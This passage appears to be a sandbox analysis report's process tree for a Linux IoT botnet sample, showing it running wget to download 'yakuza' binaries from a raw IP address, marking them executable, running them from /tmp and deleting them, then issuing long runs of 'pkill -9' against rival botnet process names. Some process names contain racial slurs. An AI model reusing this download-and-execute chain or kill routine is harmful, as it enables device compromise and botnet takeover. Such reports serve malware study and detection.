      pkill -9 5Gbf
      4⤵
      PID:2184
  - - /bin/busybox
      busybox pkill -9 5Gbf
      4⤵
      PID:2188
- - /bin/sh
    sh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"
    3⤵
    PID:2192
  - - /usr/bin/pkill
      pkill -9 SoRAxD123LOL
      4⤵
      Reads runtime system information
      PID:2194
  - - /bin/busybox
      busybox pkill -9 SoRAxD123LOL
      4⤵
      PID:2197
- - /bin/sh
    sh -c "pkill -9 iaGv || busybox pkill -9 iaGv"
    3⤵
    PID:2199
  - - /usr/bin/pkill
      pkill -9 iaGv
      4⤵
      PID:2203
  - - /bin/busybox
      busybox pkill -9 iaGv
      4⤵
      PID:2207
- - /bin/sh
    sh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"
    3⤵
    PID:2209
  - - /usr/bin/pkill
      pkill -9 5aA3
      4⤵
      PID:2211
  - - /bin/busybox
      busybox pkill -9 5aA3
      4⤵
      PID:2216
- - /bin/sh
    sh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"
    3⤵
    PID:2219
  - - /usr/bin/pkill
      pkill -9 SoRAxD420LOL
      4⤵
      PID:2221
  - - /bin/busybox
      busybox pkill -9 SoRAxD420LOL
      4⤵
      PID:2224
- - /bin/sh
    sh -c "pkill -9 insomni || busybox pkill -9 insomni"
    3⤵
    PID:2226
  - - /usr/bin/pkill
      pkill -9 insomni
      4⤵
      Reads CPU attributes
      PID:2230
  - - /bin/busybox
      busybox pkill -9 insomni
      4⤵
      PID:2234
- - /bin/sh
    sh -c "pkill -9 640277 || busybox pkill -9 640277"
    3⤵
    PID:2236
  - - /usr/bin/pkill
      pkill -9 640277
      4⤵
      PID:2239
  - - /bin/busybox
      busybox pkill -9 640277
      4⤵
      PID:2241
- - /bin/sh
    sh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"
    3⤵
    PID:2246
  - - /usr/bin/pkill
      pkill -9 SoraBeReppin1337
      4⤵
      PID:2248
  - - /bin/busybox
      busybox pkill -9 SoraBeReppin1337
      4⤵
      PID:2250
- - /bin/sh
    sh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"
    3⤵
    - System Network Configuration Discovery
    PID:2253
  - - /usr/bin/pkill
      pkill -9 ipcamCache
      4⤵
      System Network Configuration Discovery
      PID:2258
  - - /bin/busybox
      busybox pkill -9 ipcamCache
      4⤵
      System Network Configuration Discovery
      PID:2259
- - /bin/sh
    sh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"
    3⤵
    PID:2264
  - - /usr/bin/pkill
      pkill -9 66tlGg9Q
      4⤵
      PID:2265
  - - /bin/busybox
      busybox pkill -9 66tlGg9Q
      4⤵
      PID:2269
- - /bin/sh
    sh -c "pkill -9 T || busybox pkill -9 T"
    3⤵
    PID:2272
  - - /usr/bin/pkill
      pkill -9 T
      4⤵
      Reads runtime system information
      PID:2275
  - - /bin/busybox
      busybox pkill -9 T
      4⤵
      PID:2278
- - /bin/sh
    sh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"
    3⤵
    PID:2280
  - - /usr/bin/pkill
      pkill -9 jUYfouyf87
      4⤵
      PID:2284
  - - /bin/busybox
      busybox pkill -9 jUYfouyf87
      4⤵
      PID:2288
- - /bin/sh
    sh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"
    3⤵
    PID:2291
  - - /usr/bin/pkill
      pkill -9 6ke3
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2294
  - - /bin/busybox
      busybox pkill -9 6ke3
      4⤵
      PID:2295
- - /bin/sh
    sh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"
    3⤵
    PID:2298
  - - /usr/bin/pkill
      pkill -9 TOKYO3
      4⤵
      Reads CPU attributes
      PID:2301
  - - /bin/busybox
      busybox pkill -9 TOKYO3
      4⤵
      PID:2306
- - /bin/sh
    sh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"
    3⤵
    PID:2309
  - - /usr/bin/pkill
      pkill -9 lyEeaXul2dULCVxh
      4⤵
      Reads runtime system information
      PID:2312
  - - /bin/busybox
      busybox pkill -9 lyEeaXul2dULCVxh
      4⤵
      PID:2314
- - /bin/sh
    sh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"
    3⤵
    PID:2317
  - - /usr/bin/pkill
      pkill -9 93OfjHZ2z
      4⤵
      PID:2320
  - - /bin/busybox
      busybox pkill -9 93OfjHZ2z
      4⤵
      PID:2324
- - /bin/sh
    sh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"
    3⤵
    PID:2327
  - - /usr/bin/pkill
      pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2329
  - - /bin/busybox
      busybox pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      PID:2331
- - /bin/sh
    sh -c "pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l"
    3⤵
    PID:2336
  - - /usr/bin/pkill
      pkill -9 mMkiy6f87l
      4⤵
      Reads runtime system information
      PID:2339
  - - /bin/busybox
      busybox pkill -9 mMkiy6f87l
      4⤵
      PID:2342
- - /bin/sh
    sh -c "pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU"
    3⤵
    PID:2344
  - - /usr/bin/pkill
      pkill -9 A023UU4U24UIU
      4⤵
      PID:2347
  - - /bin/busybox
      busybox pkill -9 A023UU4U24UIU
      4⤵
      PID:2350
- - /bin/sh
    sh -c "pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd"
    3⤵
    PID:2352
  - - /usr/bin/pkill
      pkill -9 TheWeeknd
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2353
  - - /bin/busybox
      busybox pkill -9 TheWeeknd
      4⤵
      PID:2358
- - /bin/sh
    sh -c "pkill -9 mioribitches || busybox pkill -9 mioribitches"
    3⤵
    PID:2361
  - - /usr/bin/pkill
      pkill -9 mioribitches
      4⤵
      PID:2366
  - - /bin/busybox
      busybox pkill -9 mioribitches
      4⤵
      PID:2369
- - /bin/sh
    sh -c "pkill -9 A5p9 || busybox pkill -9 A5p9"
    3⤵
    PID:2371
  - - /usr/bin/pkill
      pkill -9 A5p9
      4⤵
      Reads CPU attributes
      PID:2375
  - - /bin/busybox
      busybox pkill -9 A5p9
      4⤵
      PID:2377
- - /bin/sh
    sh -c "pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds"
    3⤵
    PID:2379
  - - /usr/bin/pkill
      pkill -9 TheWeeknds
      4⤵
      PID:2380
  - - /bin/busybox
      busybox pkill -9 TheWeeknds
      4⤵
      PID:2386
- - /bin/sh
    sh -c "pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi"
    3⤵
    PID:2390
  - - /usr/bin/pkill
      pkill -9 mnblkjpoi
      4⤵
      Reads runtime system information
      PID:2392
  - - /bin/busybox
      busybox pkill -9 mnblkjpoi
      4⤵
      PID:2394
- - /bin/sh
    sh -c "pkill -9 AbAd || busybox pkill -9 AbAd"
    3⤵
    PID:2401
  - - /usr/bin/pkill
      pkill -9 AbAd
      4⤵
      PID:2402
  - - /bin/busybox
      busybox pkill -9 AbAd
      4⤵
      PID:2404
- - /bin/sh
    sh -c "pkill -9 Tokyos || busybox pkill -9 Tokyos"
    3⤵
    PID:2407
  - - /usr/bin/pkill
      pkill -9 Tokyos
      4⤵
      PID:2408
  - - /bin/busybox
      busybox pkill -9 Tokyos
      4⤵
      PID:2413
- - /bin/sh
    sh -c "pkill -9 neb || busybox pkill -9 neb"
    3⤵
    PID:2415
  - - /usr/bin/pkill
      pkill -9 neb
      4⤵
      PID:2418
  - - /bin/busybox
      busybox pkill -9 neb
      4⤵
      PID:2421
- - /bin/sh
    sh -c "pkill -9 Akiru || busybox pkill -9 Akiru"
    3⤵
    PID:2424
  - - /usr/bin/pkill
      pkill -9 Akiru
      4⤵
      PID:2427
  - - /bin/busybox
      busybox pkill -9 Akiru
      4⤵
      PID:2430
- - /bin/sh
    sh -c "pkill -9 U8inTz || busybox pkill -9 U8inTz"
    3⤵
    PID:2433
  - - /usr/bin/pkill
      pkill -9 U8inTz
      4⤵
      PID:2437
  - - /bin/busybox
      busybox pkill -9 U8inTz
      4⤵
      PID:2439
- - /bin/sh
    sh -c "pkill -9 netstats || busybox pkill -9 netstats"
    3⤵
    PID:2442
  - - /usr/bin/pkill
      pkill -9 netstats
      4⤵
      PID:2446
  - - /bin/busybox
      busybox pkill -9 netstats
      4⤵
      PID:2448
- - /bin/sh
    sh -c "pkill -9 Alex || busybox pkill -9 Alex"
    3⤵
    PID:2453
  - - /usr/bin/pkill
      pkill -9 Alex
      4⤵
      PID:2456
  - - /bin/busybox
      busybox pkill -9 Alex
      4⤵
      PID:2457
- - /bin/sh
    sh -c "pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T"
    3⤵
    PID:2460
  - - /usr/bin/pkill
      pkill -9 W9RCAKM20T
      4⤵
      PID:2464
  - - /bin/busybox
      busybox pkill -9 W9RCAKM20T
      4⤵
      PID:2468
- - /bin/sh
    sh -c "pkill -9 newnetword || busybox pkill -9 newnetword"
    3⤵
    PID:2470
  - - /usr/bin/pkill
      pkill -9 newnetword
      4⤵
      Reads runtime system information
      PID:2473
  - - /bin/busybox
      busybox pkill -9 newnetword
      4⤵
      PID:2477
- - /bin/sh
    sh -c "pkill -9 Ayo215 || busybox pkill -9 Ayo215"
    3⤵
    PID:2480
  - - /usr/bin/pkill
      pkill -9 Ayo215
      4⤵
      PID:2482
  - - /bin/busybox
      busybox pkill -9 Ayo215
      4⤵
      PID:2484
- - /bin/sh
    sh -c "pkill -9 Word || busybox pkill -9 Word"
    3⤵
    PID:2491
  - - /usr/bin/pkill
      pkill -9 Word
      4⤵
      PID:2492
  - - /bin/busybox
      busybox pkill -9 Word
      4⤵
      PID:2494
- - /bin/sh
    sh -c "pkill -9 nloads || busybox pkill -9 nloads"
    3⤵
    PID:2497
  - - /usr/bin/pkill
      pkill -9 nloads
      4⤵
      PID:2499
  - - /bin/busybox
      busybox pkill -9 nloads
      4⤵
      PID:2503
- - /bin/sh
    sh -c "pkill -9 BAdAsV || busybox pkill -9 BAdAsV"
    3⤵
    PID:2505
  - - /usr/bin/pkill
      pkill -9 BAdAsV
      4⤵
      PID:2510
  - - /bin/busybox
      busybox pkill -9 BAdAsV
      4⤵
      PID:2513
- - /bin/sh
    sh -c "pkill -9 Wordmane || busybox pkill -9 Wordmane"
    3⤵
    PID:2516
  - - /usr/bin/pkill
      pkill -9 Wordmane
      4⤵
      PID:2519
  - - /bin/busybox
      busybox pkill -9 Wordmane
      4⤵
      PID:2521
- - /bin/sh
    sh -c "pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa"
    3⤵
    PID:2524
  - - /usr/bin/pkill
      pkill -9 notyakuzaa
      4⤵
      PID:2526
  - - /bin/busybox
      busybox pkill -9 notyakuzaa
      4⤵
      PID:2529
- - /bin/sh
    sh -c "pkill -9 Belch || busybox pkill -9 Belch"
    3⤵
    PID:2533
  - - /usr/bin/pkill
      pkill -9 Belch
      4⤵
      Reads CPU attributes
      PID:2536
  - - /bin/busybox
      busybox pkill -9 Belch
      4⤵
      PID:2538
- - /bin/sh
    sh -c "pkill -9 Wordnets || busybox pkill -9 Wordnets"
    3⤵
    PID:2541
  - - /usr/bin/pkill
      pkill -9 Wordnets
      4⤵
      Reads runtime system information
      PID:2544
  - - /bin/busybox
      busybox pkill -9 Wordnets
      4⤵
      PID:2547
- - /bin/sh
    sh -c "pkill -9 obp || busybox pkill -9 obp"
    3⤵
    PID:2550
  - - /usr/bin/pkill
      pkill -9 obp
      4⤵
      PID:2553
  - - /bin/busybox
      busybox pkill -9 obp
      4⤵
      PID:2557
- - /bin/sh
    sh -c "pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420"
    3⤵
    PID:2559
  - - /usr/bin/pkill
      pkill -9 BigN0gg0r420
      4⤵
      PID:2560
  - - /bin/busybox
      busybox pkill -9 BigN0gg0r420
      4⤵
      PID:2566
- /bin/rm
  rm -rf yakuza.x86
  2⤵
  PID:1542
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.arm6
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/chmod
  chmod +x yakuza.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/yakuza.arm6
  ./yakuza.arm6
  2⤵
  PID:1550
- /bin/rm
  rm -rf yakuza.arm6
  2⤵
  PID:1552
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.i686
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/chmod
  chmod +x yakuza.i686
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/yakuza.i686
  ./yakuza.i686
  2⤵
  PID:1555
- - /bin/sh
    sh -c "pkill -9 902i13 || busybox pkill -9 902i13"
    3⤵
    PID:1560
  - - /usr/bin/pkill
      pkill -9 902i13
      4⤵
      Reads CPU attributes
      PID:1561
  - - /bin/busybox
      busybox pkill -9 902i13
      4⤵
      PID:1563
- - /bin/sh
    sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
    3⤵
    PID:1582
  - - /usr/bin/pkill
      pkill -9 BzSxLxBxeY
      4⤵
      PID:1583
  - - /bin/busybox
      busybox pkill -9 BzSxLxBxeY
      4⤵
      PID:1584
- - /bin/sh
    sh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"
    3⤵
    PID:1601
  - - /usr/bin/pkill
      pkill -9 HOHO-LUGO7
      4⤵
      Reads CPU attributes
      PID:1602
  - - /bin/busybox
      busybox pkill -9 HOHO-LUGO7
      4⤵
      PID:1603
- - /bin/sh
    sh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"
    3⤵
    PID:1620
  - - /usr/bin/pkill
      pkill -9 HOHO-U79OL
      4⤵
      PID:1621
  - - /bin/busybox
      busybox pkill -9 HOHO-U79OL
      4⤵
      PID:1622
- - /bin/sh
    sh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"
    3⤵
    PID:1633
  - - /usr/bin/pkill
      pkill -9 JuYfouyf87
      4⤵
      PID:1634
  - - /bin/busybox
      busybox pkill -9 JuYfouyf87
      4⤵
      PID:1635
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:1642
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      PID:1643
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:1644
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:1651
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      Reads CPU attributes
      PID:1652
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:1653
- - /bin/sh
    sh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"
    3⤵
    PID:1660
  - - /usr/bin/pkill
      pkill -9 LOLKIKEEEDDE
      4⤵
      PID:1661
  - - /bin/busybox
      busybox pkill -9 LOLKIKEEEDDE
      4⤵
      PID:1662
- - /bin/sh
    sh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"
    3⤵
    PID:1668
  - - /usr/bin/pkill
      pkill -9 ekjheory98e
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1669
  - - /bin/busybox
      busybox pkill -9 ekjheory98e
      4⤵
      PID:1671
- - /bin/sh
    sh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"
    3⤵
    PID:1677
  - - /usr/bin/pkill
      pkill -9 scansh4
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1678
  - - /bin/busybox
      busybox pkill -9 scansh4
      4⤵
      PID:1680
- - /bin/sh
    sh -c "pkill -9 MDMA || busybox pkill -9 MDMA"
    3⤵
    PID:1686
  - - /usr/bin/pkill
      pkill -9 MDMA
      4⤵
      Reads runtime system information
      PID:1687
  - - /bin/busybox
      busybox pkill -9 MDMA
      4⤵
      PID:1689
- - /bin/sh
    sh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"
    3⤵
    PID:1695
  - - /usr/bin/pkill
      pkill -9 fdevalvex
      4⤵
      Reads CPU attributes
      PID:1696
  - - /bin/busybox
      busybox pkill -9 fdevalvex
      4⤵
      PID:1698
- - /bin/sh
    sh -c "pkill -9 scanspc || busybox pkill -9 scanspc"
    3⤵
    PID:1704
  - - /usr/bin/pkill
      pkill -9 scanspc
      4⤵
      Reads runtime system information
      PID:1705
  - - /bin/busybox
      busybox pkill -9 scanspc
      4⤵
      PID:1706
- - /bin/sh
    sh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"
    3⤵
    PID:1711
  - - /usr/bin/pkill
      pkill -9 MELTEDNINJAREALZ
      4⤵
      PID:1712
  - - /bin/busybox
      busybox pkill -9 MELTEDNINJAREALZ
      4⤵
      PID:1715
- - /bin/sh
    sh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"
    3⤵
    PID:1720
  - - /usr/bin/pkill
      pkill -9 flexsonskids
      4⤵
      Reads runtime system information
      PID:1721
  - - /bin/busybox
      busybox pkill -9 flexsonskids
      4⤵
      PID:1727
- - /bin/sh
    sh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"
    3⤵
    PID:1729
  - - /usr/bin/pkill
      pkill -9 scanx86
      4⤵
      PID:1730
  - - /bin/busybox
      busybox pkill -9 scanx86
      4⤵
      PID:1736
- - /bin/sh
    sh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"
    3⤵
    PID:1740
  - - /usr/bin/pkill
      pkill -9 MISAKI-U79OL
      4⤵
      PID:1741
  - - /bin/busybox
      busybox pkill -9 MISAKI-U79OL
      4⤵
      PID:1744
- - /bin/sh
    sh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"
    3⤵
    PID:1749
  - - /usr/bin/pkill
      pkill -9 foAxi102kxe
      4⤵
      Reads CPU attributes
      PID:1750
  - - /bin/busybox
      busybox pkill -9 foAxi102kxe
      4⤵
      PID:1754
- - /bin/sh
    sh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"
    3⤵
    PID:1756
  - - /usr/bin/pkill
      pkill -9 swodjwodjwoj
      4⤵
      PID:1757
  - - /bin/busybox
      busybox pkill -9 swodjwodjwoj
      4⤵
      PID:1762
- - /bin/sh
    sh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"
    3⤵
    PID:1765
  - - /usr/bin/pkill
      pkill -9 MmKiy7f87l
      4⤵
      PID:1766
  - - /bin/busybox
      busybox pkill -9 MmKiy7f87l
      4⤵
      PID:1771
- - /bin/sh
    sh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"
    3⤵
    PID:1775
  - - /usr/bin/pkill
      pkill -9 freecookiex86
      4⤵
      PID:1778
  - - /bin/busybox
      busybox pkill -9 freecookiex86
      4⤵
      PID:1780
- - /bin/sh
    sh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"
    3⤵
    PID:1783
  - - /usr/bin/pkill
      pkill -9 sysgpu
      4⤵
      Reads CPU attributes
      PID:1786
  - - /bin/busybox
      busybox pkill -9 sysgpu
      4⤵
      PID:1791
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:1792
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      Reads runtime system information
      PID:1797
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:1800
- - /bin/sh
    sh -c "pkill -9 frgege || busybox pkill -9 frgege"
    3⤵
    PID:1803
  - - /usr/bin/pkill
      pkill -9 frgege
      4⤵
      PID:1806
  - - /bin/busybox
      busybox pkill -9 frgege
      4⤵
      PID:1808
- - /bin/sh
    sh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"
    3⤵
    PID:1810
  - - /usr/bin/pkill
      pkill -9 sysupdater
      4⤵
      Reads CPU attributes
      PID:1811
  - - /bin/busybox
      busybox pkill -9 sysupdater
      4⤵
      PID:1817
- - /bin/sh
    sh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"
    3⤵
    PID:1819
  - - /usr/bin/pkill
      pkill -9 0DnAzepd
      4⤵
      PID:1823
  - - /bin/busybox
      busybox pkill -9 0DnAzepd
      4⤵
      PID:1825
- - /bin/sh
    sh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"
    3⤵
    PID:1829
  - - /usr/bin/pkill
      pkill -9 NiGGeRD0nks69
      4⤵
      PID:1831
  - - /bin/busybox
      busybox pkill -9 NiGGeRD0nks69
      4⤵
      PID:1836
- - /bin/sh
    sh -c "pkill -9 frgreu || busybox pkill -9 frgreu"
    3⤵
    PID:1842
  - - /usr/bin/pkill
      pkill -9 frgreu
      4⤵
      PID:1843
  - - /bin/busybox
      busybox pkill -9 frgreu
      4⤵
      PID:1847
- - /bin/sh
    sh -c "pkill -9 telnetd || busybox pkill -9 telnetd"
    3⤵
    PID:1850
  - - /usr/bin/pkill
      pkill -9 telnetd
      4⤵
      PID:1852
  - - /bin/busybox
      busybox pkill -9 telnetd
      4⤵
      PID:1854
- - /bin/sh
    sh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"
    3⤵
    PID:1859
  - - /usr/bin/pkill
      pkill -9 0x766f6964
      4⤵
      PID:1860
  - - /bin/busybox
      busybox pkill -9 0x766f6964
      4⤵
      PID:1863
- - /bin/sh
    sh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"
    3⤵
    PID:1867
  - - /usr/bin/pkill
      pkill -9 NiGGeRd0nks1337
      4⤵
      Reads runtime system information
      PID:1870
  - - /bin/busybox
      busybox pkill -9 NiGGeRd0nks1337
      4⤵
      PID:1873
- - /bin/sh
    sh -c "pkill -9 gaft || busybox pkill -9 gaft"
    3⤵
    PID:1875
  - - /usr/bin/pkill
      pkill -9 gaft
      4⤵
      PID:1878
  - - /bin/busybox
      busybox pkill -9 gaft
      4⤵
      PID:1882
- - /bin/sh
    sh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"
    3⤵
    PID:1884
  - - /usr/bin/pkill
      pkill -9 urasgbsigboa
      4⤵
      PID:1885
  - - /bin/busybox
      busybox pkill -9 urasgbsigboa
      4⤵
      PID:1892
- - /bin/sh
    sh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"
    3⤵
    PID:1894
  - - /usr/bin/pkill
      pkill -9 120i3UI49
      4⤵
      PID:1896
  - - /bin/busybox
      busybox pkill -9 120i3UI49
      4⤵
      PID:1901
- - /bin/sh
    sh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"
    3⤵
    PID:1906
  - - /usr/bin/pkill
      pkill -9 OaF3
      4⤵
      PID:1907
  - - /bin/busybox
      busybox pkill -9 OaF3
      4⤵
      PID:1909
- - /bin/sh
    sh -c "pkill -9 geae || busybox pkill -9 geae"
    3⤵
    PID:1912
  - - /usr/bin/pkill
      pkill -9 geae
      4⤵
      Reads CPU attributes
      PID:1915
  - - /bin/busybox
      busybox pkill -9 geae
      4⤵
      PID:1918
- - /bin/sh
    sh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"
    3⤵
    PID:1921
  - - /usr/bin/pkill
      pkill -9 vaiolmao
      4⤵
      Reads CPU attributes
      PID:1924
  - - /bin/busybox
      busybox pkill -9 vaiolmao
      4⤵
      PID:1926
- - /bin/sh
    sh -c "pkill -9 123123a || busybox pkill -9 123123a"
    3⤵
    PID:1929
  - - /usr/bin/pkill
      pkill -9 123123a
      4⤵
      PID:1933
  - - /bin/busybox
      busybox pkill -9 123123a
      4⤵
      PID:1936
- - /bin/sh
    sh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"
    3⤵
    PID:1938
  - - /usr/bin/pkill
      pkill -9 Ofurain0n4H34D
      4⤵
      PID:1943
  - - /bin/busybox
      busybox pkill -9 Ofurain0n4H34D
      4⤵
      PID:1945
- - /bin/sh
    sh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"
    3⤵
    PID:1951
  - - /usr/bin/pkill
      pkill -9 ggTrex
      4⤵
      PID:1952
  - - /bin/busybox
      busybox pkill -9 ggTrex
      4⤵
      PID:1955
- - /bin/sh
    sh -c "pkill -9 wasads || busybox pkill -9 wasads"
    3⤵
    PID:1958
  - - /usr/bin/pkill
      pkill -9 wasads
      4⤵
      PID:1961
  - - /bin/busybox
      busybox pkill -9 wasads
      4⤵
      PID:1962
- - /bin/sh
    sh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"
    3⤵
    PID:1965
  - - /usr/bin/pkill
      pkill -9 1293194hjXD
      4⤵
      Reads CPU attributes
      PID:1966
  - - /bin/busybox
      busybox pkill -9 1293194hjXD
      4⤵
      PID:1971
- - /bin/sh
    sh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"
    3⤵
    PID:1974
  - - /usr/bin/pkill
      pkill -9 OthLaLosn
      4⤵
      PID:1975
  - - /bin/busybox
      busybox pkill -9 OthLaLosn
      4⤵
      PID:1980
- - /bin/sh
    sh -c "pkill -9 ggt || busybox pkill -9 ggt"
    3⤵
    PID:1983
  - - /usr/bin/pkill
      pkill -9 ggt
      4⤵
      PID:1986
  - - /bin/busybox
      busybox pkill -9 ggt
      4⤵
      PID:1989
- - /bin/sh
    sh -c "pkill -9 wget-log || busybox pkill -9 wget-log"
    3⤵
    PID:1993
  - - /usr/bin/pkill
      pkill -9 wget-log
      4⤵
      PID:1996
  - - /bin/busybox
      busybox pkill -9 wget-log
      4⤵
      PID:1999
- - /bin/sh
    sh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"
    3⤵
    PID:2001
  - - /usr/bin/pkill
      pkill -9 1337SoraLOADER
      4⤵
      PID:2004
  - - /bin/busybox
      busybox pkill -9 1337SoraLOADER
      4⤵
      PID:2008
- - /bin/sh
    sh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"
    3⤵
    PID:2010
  - - /usr/bin/pkill
      pkill -9 SAIAKINA
      4⤵
      PID:2014
  - - /bin/busybox
      busybox pkill -9 SAIAKINA
      4⤵
      PID:2018
- - /bin/sh
    sh -c "pkill -9 ggtq || busybox pkill -9 ggtq"
    3⤵
    PID:2021
  - - /usr/bin/pkill
      pkill -9 ggtq
      4⤵
      PID:2022
  - - /bin/busybox
      busybox pkill -9 ggtq
      4⤵
      PID:2026
- - /bin/sh
    sh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"
    3⤵
    PID:2029
  - - /usr/bin/pkill
      pkill -9 1378bfp919GRB1Q2
      4⤵
      Reads runtime system information
      PID:2033
  - - /bin/busybox
      busybox pkill -9 1378bfp919GRB1Q2
      4⤵
      PID:2035
- - /bin/sh
    sh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"
    3⤵
    PID:2039
  - - /usr/bin/pkill
      pkill -9 SAIAKUSO
      4⤵
      PID:2042
  - - /bin/busybox
      busybox pkill -9 SAIAKUSO
      4⤵
      PID:2045
- - /bin/sh
    sh -c "pkill -9 ggtr || busybox pkill -9 ggtr"
    3⤵
    PID:2048
  - - /usr/bin/pkill
      pkill -9 ggtr
      4⤵
      PID:2049
  - - /bin/busybox
      busybox pkill -9 ggtr
      4⤵
      PID:2054
- - /bin/sh
    sh -c "pkill -9 14Fa || busybox pkill -9 14Fa"
    3⤵
    PID:2055
  - - /usr/bin/pkill
      pkill -9 14Fa
      4⤵
      PID:2058
  - - /bin/busybox
      busybox pkill -9 14Fa
      4⤵
      PID:2061
- - /bin/sh
    sh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"
    3⤵
    PID:2064
  - - /usr/bin/pkill
      pkill -9 SEXSLAVE1337
      4⤵
      PID:2065
  - - /bin/busybox
      busybox pkill -9 SEXSLAVE1337
      4⤵
      PID:2071
- - /bin/sh
    sh -c "pkill -9 ggtt || busybox pkill -9 ggtt"
    3⤵
    PID:2073
  - - /usr/bin/pkill
      pkill -9 ggtt
      4⤵
      PID:2076
  - - /bin/busybox
      busybox pkill -9 ggtt
      4⤵
      PID:2079
- - /bin/sh
    sh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"
    3⤵
    PID:2084
  - - /usr/bin/pkill
      pkill -9 1902a3u912u3u4
      4⤵
      PID:2085
  - - /bin/busybox
      busybox pkill -9 1902a3u912u3u4
      4⤵
      PID:2090
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:2093
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      Reads CPU attributes
      PID:2094
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:2097
- - /bin/sh
    sh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"
    3⤵
    PID:2100
  - - /usr/bin/pkill
      pkill -9 haetrghbr
      4⤵
      PID:2101
  - - /bin/busybox
      busybox pkill -9 haetrghbr
      4⤵
      PID:2107
- - /bin/sh
    sh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"
    3⤵
    PID:2109
  - - /usr/bin/pkill
